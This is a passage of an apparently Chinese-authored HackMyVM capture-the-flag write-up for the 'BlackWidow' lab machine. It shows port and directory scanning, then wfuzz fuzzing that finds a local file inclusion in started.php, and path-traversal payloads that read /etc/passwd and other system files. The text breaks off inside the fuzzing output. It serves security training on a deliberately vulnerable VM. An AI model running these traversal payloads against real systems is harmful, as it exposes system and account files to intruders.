{"id":882,"date":"2025-06-17T13:27:22","date_gmt":"2025-06-17T05:27:22","guid":{"rendered":"http:\/\/162.14.82.114\/?p=882"},"modified":"2025-06-17T13:34:26","modified_gmt":"2025-06-17T05:34:26","slug":"hmv-_-blackwidow","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/882\/06\/17\/2025\/","title":{"rendered":"hmv[-_-]BlackWidow"},"content":{"rendered":"<h1>BlackWidow<\/h1>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506171326598.png\" alt=\"image-20250616175545909\" style=\"zoom:50%;\" \/><br \/>\n<img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506171326600.png\" alt=\"image-20250617104520725\" style=\"zoom:50%;\" \/><\/p>
\n<h2>Information Gathering<\/h2>\n<h3>Port Scanning<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/BlackWindow]\n\u2514\u2500$ rustscan -a $IP -- -sCV\n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-&#039; `-&#039;`-----&#039;`----&#039;  `-&#039;  `----&#039;  `---&#039; `-&#039;  `-&#039;`-&#039; `-&#039;\nThe Modern Day Port Scanner.\n________________________________________\n: http:\/\/discord.skerritt.blog         :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nTCP handshake? More like a friendly high-five!\n\n[~] The config file is expected to be at &quot;\/home\/kali\/.rustscan.toml&quot;\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan&#039;s speed. Use the Docker image, or up the Ulimit with &#039;--ulimit 5000&#039;. 
\nOpen 192.168.10.100:80\nOpen 192.168.10.100:111\nOpen 192.168.10.100:22\nOpen 192.168.10.100:2049\nOpen 192.168.10.100:3128\nOpen 192.168.10.100:35455\nOpen 192.168.10.100:38113\nOpen 192.168.10.100:38787\nOpen 192.168.10.100:42771\n\nPORT      STATE SERVICE    REASON         VERSION\n22\/tcp    open  ssh        syn-ack ttl 64 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)\n| ssh-hostkey: \n|   2048 f8:3b:7c:ca:c2:f6:5a:a6:0e:3f:f9:cf:1b:a9:dd:1e (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDnsjlNONcku933wJXG6c7zW2yFvbroPDS8PcoWke6IpBG6RbVokkmOyDCdTzYtQbxwb5I17h8AK1d\/a+SPQWjEG71TVzcogM\/RpbtnP27SlYIVRv7de6unovPJlXmEBW5ACHRtRd5OoJ6oyv4FvR3SlbgaJkQEYG3SxBTcPLuSchTqimBh45II3s81SCU0O22j9dxIatzjhlFGOe9bVP9kfC8oF5Llrve3ReRx\/Zt99ByY5oGNZ57dpb+sdjvHdJlBIS02D7mHF+GhW9VixYpg1gJFfcNdaJksbrjVoLXIkC3SSHqgaiFYL5Y5JSEO44oP9Rp+igdgc29ysGXOS417\n|   256 04:31:5a:34:d4:9b:14:71:a0:0f:22:78:2d:f3:b6:f6 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMdVV7LG2ve48JMOO6FbWxmdQhQ8KHcOKSkcIlGPmtdA9EUjCh8TRN9q\/lfsZDrq54aJ5brqcI\/pvQqwPFanKW8=\n|   256 4e:42:8e:69:b7:90:e8:27:68:df:68:8a:83:a7:87:9c (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIIzpLR6WAXAhIzPtdFobvUkZSDsIL9juu2N70C6tcyxy\n80\/tcp    open  http       syn-ack ttl 64 Apache httpd 2.4.38 ((Debian))\n|_http-server-header: Apache\/2.4.38 (Debian)\n| http-methods: \n|_  Supported Methods: POST OPTIONS HEAD GET\n|_http-title: Site doesn&#039;t have a title (text\/html).\n111\/tcp   open  rpcbind    syn-ack ttl 64 2-4 (RPC #100000)\n| rpcinfo: \n|   program version    port\/proto  service\n|   100000  2,3,4        111\/tcp   rpcbind\n|   100000  2,3,4        111\/udp   rpcbind\n|   100000  3,4          111\/tcp6  rpcbind\n|   100000  3,4          111\/udp6  rpcbind\n|   100003  3           2049\/udp   nfs\n|   100003  3           2049\/udp6  nfs\n|   100003  3,4         2049\/tcp   nfs\n|   100003  3,4         2049\/tcp6  nfs\n|   100005  1,2,3      35455\/tcp   mountd\n|   100005  
1,2,3      36358\/udp6  mountd\n|   100005  1,2,3      43763\/tcp6  mountd\n|   100005  1,2,3      48272\/udp   mountd\n|   100021  1,3,4      34813\/udp6  nlockmgr\n|   100021  1,3,4      38113\/tcp   nlockmgr\n|   100021  1,3,4      38665\/tcp6  nlockmgr\n|   100021  1,3,4      53671\/udp   nlockmgr\n|   100227  3           2049\/tcp   nfs_acl\n|   100227  3           2049\/tcp6  nfs_acl\n|   100227  3           2049\/udp   nfs_acl\n|_  100227  3           2049\/udp6  nfs_acl\n2049\/tcp  open  nfs        syn-ack ttl 64 3-4 (RPC #100003)\n3128\/tcp  open  http-proxy syn-ack ttl 64 Squid http proxy 4.6\n|_http-title: ERROR: The requested URL could not be retrieved\n|_http-server-header: squid\/4.6\n35455\/tcp open  mountd     syn-ack ttl 64 1-3 (RPC #100005)\n38113\/tcp open  nlockmgr   syn-ack ttl 64 1-4 (RPC #100021)\n38787\/tcp open  mountd     syn-ack ttl 64 1-3 (RPC #100005)\n42771\/tcp open  mountd     syn-ack ttl 64 1-3 (RPC #100005)\nMAC Address: 08:00:27:2F:F0:D2 (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n<h3>Directory Scanning<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/BlackWindow]\n\u2514\u2500$ gobuster dir -u http:\/\/$IP\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,txt,html,bak\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/192.168.10.100\/\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              php,txt,html,bak\n[+] Timeout:                 
10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/.php                 (Status: 403) [Size: 279]\n\/index.html           (Status: 200) [Size: 84]\n\/docs                 (Status: 301) [Size: 315] [--&gt; http:\/\/192.168.10.100\/docs\/]\n\/.html                (Status: 403) [Size: 279]\n\/company              (Status: 301) [Size: 318] [--&gt; http:\/\/192.168.10.100\/company\/]\n\/js                   (Status: 301) [Size: 313] [--&gt; http:\/\/192.168.10.100\/js\/]\n\/.php                 (Status: 403) [Size: 279]\n\/.html                (Status: 403) [Size: 279]\n\/server-status        (Status: 403) [Size: 279]\nProgress: 1102800 \/ 1102805 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n<h2>Vulnerability Discovery<\/h2>\n<h3>Footprinting<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/BlackWindow]\n\u2514\u2500$ whatweb $IP       \nhttp:\/\/192.168.10.100 [200 OK] Apache[2.4.38], Country[RESERVED][ZZ], HTTPServer[Debian Linux][Apache\/2.4.38 (Debian)], IP[192.168.10.100]<\/code><\/pre>
\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506171326601.png\" alt=\"image-20250617104752072\" style=\"zoom:50%;\" \/><\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/BlackWindow]\n\u2514\u2500$ curl -s http:\/\/$IP                                                \n&lt;html&gt;\n&lt;img src=&quot;wallpaper.jpg&quot; alt=&quot;wallpaper&quot; width=&quot;100%&quot; height=&quot;100%&quot;&gt;\n&lt;\/html&gt;\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/BlackWindow]\n\u2514\u2500$ wget http:\/\/$IP\/wallpaper.jpg             \n--2025-06-16 22:48:24--  http:\/\/192.168.10.100\/wallpaper.jpg\nConnecting to 192.168.10.100:80... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 309964 (303K) [image\/jpeg]\nSaving to: \u2018wallpaper.jpg\u2019\n\nwallpaper.jpg                                   100%[====================================================================================================&gt;] 302.70K  --.-KB\/s    in 0.01s   \n\n2025-06-16 22:48:24 (25.3 MB\/s) - \u2018wallpaper.jpg\u2019 saved [309964\/309964]\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/BlackWindow]\n\u2514\u2500$ exiftool wallpaper.jpg                                   \nExifTool Version Number         : 13.25\nFile Name                       : wallpaper.jpg\nDirectory                       : .\nFile Size                       : 310 kB\nFile Modification Date\/Time     : 2020:12:13 05:17:12-05:00\nFile Access Date\/Time           : 2025:06:16 22:48:24-04:00\nFile Inode Change Date\/Time     : 2025:06:16 22:48:24-04:00\nFile Permissions                : -rw-rw-r--\nFile Type                       : JPEG\nFile Type Extension             : jpg\nMIME Type                       : image\/jpeg\nJFIF Version                    : 1.01\nResolution Unit                 : None\nX Resolution                    
: 1\nY Resolution                    : 1\nImage Width                     : 2308\nImage Height                    : 1328\nEncoding Process                : Baseline DCT, Huffman coding\nBits Per Sample                 : 8\nColor Components                : 3\nY Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)\nImage Size                      : 2308x1328\nMegapixels                      : 3.1\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/BlackWindow]\n\u2514\u2500$ stegseek -wl \/usr\/share\/wordlists\/rockyou.txt wallpaper.jpg \nStegSeek 0.6 - https:\/\/github.com\/RickdeJager\/StegSeek\n\n[i] Progress: 99.57% (132.9 MB)           \n[!] error: Could not find a valid passphrase.<\/code><\/pre>\n<h3>Sensitive Port Probing<\/h3>\n<h4>rpc + nfs<\/h4>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/BlackWindow]\n\u2514\u2500$ rpcinfo $IP            \n   program version netid     address                service    owner\n    100000    4    tcp6      ::.0.111               portmapper superuser\n    100000    3    tcp6      ::.0.111               portmapper superuser\n    100000    4    udp6      ::.0.111               portmapper superuser\n    100000    3    udp6      ::.0.111               portmapper superuser\n    100000    4    tcp       0.0.0.0.0.111          portmapper superuser\n    100000    3    tcp       0.0.0.0.0.111          portmapper superuser\n    100000    2    tcp       0.0.0.0.0.111          portmapper superuser\n    100000    4    udp       0.0.0.0.0.111          portmapper superuser\n    100000    3    udp       0.0.0.0.0.111          portmapper superuser\n    100000    2    udp       0.0.0.0.0.111          portmapper superuser\n    100000    4    local     \/run\/rpcbind.sock      portmapper superuser\n    100000    3    local     \/run\/rpcbind.sock      portmapper superuser\n    100005    1    udp       0.0.0.0.235.10         mountd     superuser\n    100005    1    tcp       0.0.0.0.167.19         
mountd     superuser\n    100005    1    udp6      ::.134.181             mountd     superuser\n    100005    1    tcp6      ::.151.5               mountd     superuser\n    100005    2    udp       0.0.0.0.145.88         mountd     superuser\n    100005    2    tcp       0.0.0.0.151.131        mountd     superuser\n    100005    2    udp6      ::.190.192             mountd     superuser\n    100005    2    tcp6      ::.170.1               mountd     superuser\n    100005    3    udp       0.0.0.0.188.144        mountd     superuser\n    100005    3    tcp       0.0.0.0.138.127        mountd     superuser\n    100005    3    udp6      ::.142.6               mountd     superuser\n    100005    3    tcp6      ::.170.243             mountd     superuser\n    100003    3    tcp       0.0.0.0.8.1            nfs        superuser\n    100003    4    tcp       0.0.0.0.8.1            nfs        superuser\n    100227    3    tcp       0.0.0.0.8.1            nfs_acl    superuser\n    100003    3    udp       0.0.0.0.8.1            nfs        superuser\n    100227    3    udp       0.0.0.0.8.1            nfs_acl    superuser\n    100003    3    tcp6      ::.8.1                 nfs        superuser\n    100003    4    tcp6      ::.8.1                 nfs        superuser\n    100227    3    tcp6      ::.8.1                 nfs_acl    superuser\n    100003    3    udp6      ::.8.1                 nfs        superuser\n    100227    3    udp6      ::.8.1                 nfs_acl    superuser\n    100021    1    udp       0.0.0.0.209.167        nlockmgr   superuser\n    100021    3    udp       0.0.0.0.209.167        nlockmgr   superuser\n    100021    4    udp       0.0.0.0.209.167        nlockmgr   superuser\n    100021    1    tcp       0.0.0.0.148.225        nlockmgr   superuser\n    100021    3    tcp       0.0.0.0.148.225        nlockmgr   superuser\n    100021    4    tcp       0.0.0.0.148.225        nlockmgr   superuser\n    100021    1    udp6      ::.135.253             
nlockmgr   superuser\n    100021    3    udp6      ::.135.253             nlockmgr   superuser\n    100021    4    udp6      ::.135.253             nlockmgr   superuser\n    100021    1    tcp6      ::.151.9               nlockmgr   superuser\n    100021    3    tcp6      ::.151.9               nlockmgr   superuser\n    100021    4    tcp6      ::.151.9               nlockmgr   superuser\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/BlackWindow]\n\u2514\u2500$ showmount -e $IP\nExport list for 192.168.10.100:<\/code><\/pre>\n<p>The export list is empty.<\/p>\n<h3>Sensitive Directories<\/h3>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506171326602.png\" alt=\"image-20250617105510274\" style=\"zoom:50%;\" \/><\/p>\n<p>Try scanning it:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/BlackWindow]\n\u2514\u2500$ gobuster dir -u http:\/\/$IP\/company\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,txt,html,bak\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/192.168.10.100\/company\/\n[+] Method:                  GET\n[+] Threads:         
        10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              php,txt,html,bak\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/.php                 (Status: 403) [Size: 279]\n\/index.html           (Status: 200) [Size: 42271]\n\/.html                (Status: 403) [Size: 279]\n\/assets               (Status: 301) [Size: 325] [--&gt; http:\/\/192.168.10.100\/company\/assets\/]\n\/forms                (Status: 301) [Size: 324] [--&gt; http:\/\/192.168.10.100\/company\/forms\/]\n\/changelog.txt        (Status: 200) [Size: 1175]\n\/Readme.txt           (Status: 200) [Size: 222]\n\/.html                (Status: 403) [Size: 279]\n\/.php                 (Status: 403) [Size: 279]\n\/started.php          (Status: 200) [Size: 42271]\nProgress: 1102800 \/ 1102805 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n<p>Take a look at what is there:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/BlackWindow]\n\u2514\u2500$ whatweb http:\/\/$IP\/company\/\nhttp:\/\/192.168.10.100\/company\/ [200 OK] Apache[2.4.38], Bootstrap, Country[RESERVED][ZZ], Email[info@example.com], Frame, HTML5, HTTPServer[Debian Linux][Apache\/2.4.38 (Debian)], IP[192.168.10.100], JQuery, Script, Title[Arsha Bootstrap Template - Index]\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/BlackWindow]\n\u2514\u2500$ curl -s http:\/\/$IP\/company\/changelog.txt                         \nVersion: 3.0.3\n  - Updated Bootstrap to version 5.0.0-beta1\n  - Updated the PHP Email Form to v2.3\n  - Other small fixes and improvements\n\nVersion: 
3.0.2\n  - Updated Bootstrap to version 5.0.0-alpha3\n  - Updated all outdated third party vendor libraries to their latest versions\n\nVersion: 3.0.1\n  - Update Bootstrap v5.0 to Alpha 2\n  - Updated all outdated third party vendor libraries to their latest versions\n\nVersion: 3.0.0\n  - Initial release with using the Bootstrap v5.0 (Alpha)\n\nVersion: 2.2.0\n  - Updated the PHP Email Form to v2.1\n  - Other small fixes and improvements\n\nVersion: 2.1.0\n  - Updated Bootstrap to version 4.5.0\n  - Updated the PHP Email Form library to version 2.0 with reCaptcha support\n  - Aded inner-page.html tempalte\n  - Updated all outdated third party vendor libraries to their latest versions\n  - Other small fixes and improvements\n\nVersion: 2.0.0\n  - The template was rebuilt from scratch with the latest Bootstrap version (4.4.1)\n  - Added SMPTP support for the contact form script (Pro)\n  - Added NodeJS NPM Development version (Pro unlimited &amp; Membership members)\n\nVersion: 1.0.0\n  - Initial Release\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/BlackWindow]\n\u2514\u2500$ curl -s http:\/\/$IP\/company\/Readme.txt   \nThanks for downloading this template!\n\nTemplate Name: Arsha\nTemplate URL: https:\/\/bootstrapmade.com\/arsha-free-bootstrap-html-template-corporate\/\nAuthor: BootstrapMade.com\nLicense: https:\/\/bootstrapmade.com\/license\/<\/code><\/pre>\n<h3>FUZZ LFI<\/h3>\n<p>Viewing the source of <code>started.php<\/code> shows:<\/p>
\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506171326603.png\" alt=\"image-20250617110732001\" style=\"zoom:50%;\" \/><\/p>\n<p>Nothing useful there, so <code>fuzz<\/code> it to check whether a file inclusion vulnerability exists:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/BlackWindow]\n\u2514\u2500$ wfuzz -c -w \/usr\/share\/wordlists\/seclists\/Fuzzing\/LFI\/LFI-Jhaddix.txt -u &quot;http:\/\/$IP\/company\/started.php?file=FUZZ&quot; --hw 0 2&gt;\/dev\/null \n********************************************************\n* Wfuzz 3.1.0 - The Web Fuzzer                         *\n********************************************************\n\nTarget: http:\/\/192.168.10.100\/company\/started.php?file=FUZZ\nTotal requests: 929\n\n=====================================================================\nID           Response   Lines    Word       Chars       Payload                                                                                                                     \n=====================================================================\n\n000000261:   200        29 L     43 W       1582 Ch     &quot;..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd&quot;                                                       \n000000258:   200        29 L     43 W       1582 Ch     &quot;..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd&quot;                                              \n000000260:   200        29 L     43 W       1582 Ch     &quot;..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd&quot;                                           
         \n000000259:   200        29 L     43 W       1582 Ch     &quot;..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd&quot;                                                 \n000000262:   200        29 L     43 W       1582 Ch     &quot;..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd&quot;                                                          \n000000263:   200        29 L     43 W       1582 Ch     &quot;..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd&quot;                                                             \n000000264:   200        29 L     43 W       1582 Ch     &quot;..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd&quot;                                                                \n000000265:   200        29 L     43 W       1582 Ch     &quot;..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd&quot;                                                                   \n000000266:   200        29 L     43 W       1582 Ch     &quot;..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd&quot;                                                                      \n000000267:   200        29 L     43 W       1582 Ch     &quot;..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd&quot;                                                                         \n\nTotal time: 0.799150\nProcessed Requests: 929\nFiltered Requests: 919\nRequests\/sec.: 1162.484\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/BlackWindow]\n\u2514\u2500$ curl -s 
&quot;http:\/\/$IP\/company\/started.php?file=..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd&quot;\nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/var\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\n_apt:x:100:65534::\/nonexistent:\/usr\/sbin\/nologin\nsystemd-timesync:x:101:102:systemd Time Synchronization,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-network:x:102:103:systemd Network Management,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-resolve:x:103:104:systemd Resolver,,,:\/run\/systemd:\/usr\/sbin\/nologin\nmessagebus:x:104:110::\/nonexistent:\/usr\/sbin\/nologin\navahi-autoipd:x:105:112:Avahi autoip daemon,,,:\/var\/lib\/avahi-autoipd:\/usr\/sbin\/nologin\nsshd:x:106:65534::\/run\/sshd:\/usr\/sbin\/nologin\nsystemd-coredump:x:999:999:systemd Core Dumper:\/:\/usr\/sbin\/nologin\nviper:x:1001:1001:Viper,,,:\/home\/viper:\/bin\/bash\n_rpc:x:107:65534::\/run\/rpcbind:\/usr\/sbin\/nologin\nstatd:x:108:65534::\/var\/lib\/nfs:\/usr\/sbin\/nologin\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/BlackWindow]\n\u2514\u2500$ curl -s 
&quot;http:\/\/$IP\/company\/started.php?file=..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd&quot; | grep sh | cut -d: -f1\nroot\nsshd\nviper<\/code><\/pre>\n<h3>Log Inclusion<\/h3>\n<p>Fuzz again, this time with a directory traversal prefix:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/BlackWindow]\n\u2514\u2500$ wfuzz -c -w \/usr\/share\/wordlists\/seclists\/Fuzzing\/LFI\/LFI-Jhaddix.txt -u &quot;http:\/\/$IP\/company\/started.php?file=..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/FUZZ&quot; --hw 0 2&gt;\/dev\/null     \n********************************************************\n* Wfuzz 3.1.0 - The Web Fuzzer                         *\n********************************************************\n\nTarget: http:\/\/192.168.10.100\/company\/started.php?file=..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/FUZZ\nTotal requests: 929\n\n=====================================================================\nID           Response   Lines    Word       Chars       Payload                                                                                                                     \n=====================================================================\n\n000000023:   200        29 L     43 W       1582 Ch     &quot;..%2F..%2F..%2F%2F..%2F..%2Fetc\/passwd&quot;                                                                                    \n000000016:   200        29 L     43 W       1582 Ch     &quot;\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/etc\/passwd&quot;                                         \n000000131:   200        22 L     190 W      1042 Ch     &quot;\/etc\/crontab&quot;                                                                                                              \n000000129:   200        21 L     102 W      881 Ch      &quot;\/etc\/apt\/sources.list&quot;                                   
                                                                  \n000000121:   200        227 L    1115 W     7224 Ch     &quot;\/etc\/apache2\/apache2.conf&quot;                                                                                                 \n000000138:   200        55 L     55 W       727 Ch      &quot;\/etc\/group&quot;                                                                                                                \n000000135:   200        12 L     88 W       664 Ch      &quot;\/etc\/fstab&quot;                                                                                                                \n000000206:   200        7 L      22 W       184 Ch      &quot;..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/hosts&quot;                                                                             \n000000209:   200        17 L     111 W      711 Ch      &quot;\/etc\/hosts.deny&quot;                                                                                                           \n000000208:   200        10 L     57 W       411 Ch      &quot;\/etc\/hosts.allow&quot;                                                                                                          \n000000205:   200        7 L      22 W       184 Ch      &quot;\/etc\/hosts&quot;                                                                                                                \n000000269:   200        29 L     43 W       1582 Ch     &quot;..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd&quot;                                                                               \n000000272:   200        29 L     43 W       1582 Ch     &quot;..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd&quot;                                                                                        \n000000270:   200        29 L     43 W       1582 Ch     &quot;..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd&quot;                                      
                                            \n000000258:   200        29 L     43 W       1582 Ch     &quot;..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd&quot;                                              \n000000268:   200        29 L     43 W       1582 Ch     &quot;..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd&quot;                                                                            \n000000271:   200        29 L     43 W       1582 Ch     &quot;..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd&quot;                                                                                     \n000000267:   200        29 L     43 W       1582 Ch     &quot;..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd&quot;                                                                         \n000000265:   200        29 L     43 W       1582 Ch     &quot;..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd&quot;                                                                   \n000000263:   200        29 L     43 W       1582 Ch     &quot;..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd&quot;                                                             \n000000266:   200        29 L     43 W       1582 Ch     &quot;..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd&quot;                                                                      \n000000262:   200        29 L     43 W       1582 Ch     &quot;..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd&quot;                                                          \n000000264:   200        29 L     43 W       1582 Ch     &quot;..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd&quot;                                                                \n000000261:   200        29 L     43 W       1582 Ch     
&quot;..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd&quot;                                                       \n000000257:   200        29 L     43 W       1582 Ch     &quot;\/etc\/passwd&quot;                                                                                                               \n000000259:   200        29 L     43 W       1582 Ch     &quot;..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd&quot;                                                 \n000000260:   200        29 L     43 W       1582 Ch     &quot;..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd&quot;                                                    \n000000254:   200        29 L     43 W       1582 Ch     &quot;\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd&quot;                                                                                 \n000000253:   200        29 L     43 W       1582 Ch     &quot;\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/etc\/passwd&quot;                                                                                         \n000000250:   200        20 L     63 W       510 Ch      &quot;\/etc\/nsswitch.conf&quot;                                                                                                        \n000000249:   200        19 L     103 W      767 Ch      &quot;\/etc\/netconfig&quot;                                                                                                            \n000000246:   200        7 L      40 W       286 Ch      &quot;\/etc\/motd&quot;                                                                                                                 \n000000237:   200        2 L      5 W        27 Ch       &quot;\/etc\/issue&quot;                                                                                                                \n000000236:   200        355 L    1050 
W     8181 Ch     &quot;\/etc\/init.d\/apache2&quot;                                                                                                       \n000000273:   200        29 L     43 W       1582 Ch     &quot;..\/..\/..\/..\/..\/..\/..\/etc\/passwd&quot;                                                                                           \n000000275:   200        29 L     43 W       1582 Ch     &quot;..\/..\/..\/..\/..\/etc\/passwd&quot;                                                                                                 \n000000279:   200        29 L     43 W       1582 Ch     &quot;..\/etc\/passwd&quot;                                                                                                             \n000000283:   200        29 L     43 W       1582 Ch     &quot;etc\/passwd&quot;                                                                                                                \n000000278:   200        29 L     43 W       1582 Ch     &quot;..\/..\/etc\/passwd&quot;                                                                                                          \n000000277:   200        29 L     43 W       1582 Ch     &quot;..\/..\/..\/etc\/passwd&quot;                                                                                                       \n000000274:   200        29 L   